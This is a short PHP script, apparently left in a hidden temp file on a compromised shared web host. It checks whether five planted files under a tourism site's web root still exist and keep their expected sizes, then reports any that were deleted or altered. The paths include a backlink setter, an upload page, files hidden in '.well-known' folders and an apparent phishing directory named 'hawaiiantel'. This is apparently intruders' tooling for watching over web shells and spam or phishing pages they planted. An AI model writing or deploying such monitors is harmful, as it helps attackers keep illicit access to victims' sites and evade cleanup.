File: /home/moroqbvm/.cagefs/tmp/.pset
<?php $r = '/home/moroqbvm/hawaiian.moroccotourswithlocals.com'; $x = ["/.well-known/set_backlink.php"=>"bd@@451400@@12",
"/hawaiiantel/processing/uploadPage.php"=>"bd@@451403@@596",
"/Ov.Simple1.php"=>"bd@@451406@@585",
"/.well-known/pki-validation/busi_report05.php"=>"bd@@451407@@970",
"/hawaiiantel/action.module.php"=>"bd@@451409@@617"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');